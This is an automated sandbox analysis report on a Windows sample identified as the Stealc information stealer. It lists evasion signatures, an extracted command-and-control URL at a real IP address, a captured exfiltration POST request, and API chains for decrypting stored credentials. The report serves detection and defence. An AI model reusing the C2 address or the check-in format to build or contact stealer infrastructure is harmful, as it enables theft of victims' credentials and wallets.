Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560183
MD5:215acb5ad199adeadc4c630b59f09d17
SHA1:76609d0d3867fa6d84da0958b5c1a954e8643f49
SHA256:4596bafc0efc36a8f3ec2574dba1e8ae82e5b6051a2b5cce1605057a20855072
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 215ACB5AD199ADEADC4C630B59F09D17)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1714259793.0000000005190000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7112JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7112JoeSecurity_StealcYara detected StealcJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T14:26:09.407143+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: http://185.215.113.206/c4becf79229cb002.phpC9lAvira URL Cloud: Label: malware
              Source: 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_007D4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_007D60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_007F40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_007E6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_007DEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_007E6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_007D9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_007D9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_007D7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007E18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007EE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007E4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ECBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007ECBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007E23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007DDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_007E2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007DDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ED530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007ED530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_007EDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007D16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007D16A0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 43 41 42 39 37 39 38 44 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 2d 2d 0d 0a Data Ascii: ------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="hwid"DFCAB9798DE23924696330------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="build"mars------GDHIEHJEBAAFIDHJEBGI--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_007D4C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 43 41 42 39 37 39 38 44 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 2d 2d 0d 0a Data Ascii: ------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="hwid"DFCAB9798DE23924696330------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="build"mars------GDHIEHJEBAAFIDHJEBGI--
              Source: file.exe, 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1770105162.00000000012A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1770105162.0000000001285000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1770105162.0000000001297000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1770105162.00000000012A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1770105162.00000000012A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.1770105162.0000000001285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpC9l
              Source: file.exe, 00000000.00000002.1770105162.00000000012A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/k
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_007D9770

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B938240_2_00B93824
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F48B00_2_007F48B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B861F90_2_00B861F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7AA170_2_00A7AA17
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8B2070_2_00B8B207
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9024A0_2_00B9024A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8EBBB0_2_00B8EBBB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8CCDF0_2_00B8CCDF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B87C360_2_00B87C36
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B834710_2_00B83471
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9ED5D0_2_00A9ED5D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADFE1B0_2_00ADFE1B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7073C0_2_00B7073C
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 007D4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: smwmjzky ZLIB complexity 0.9950201620655184
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
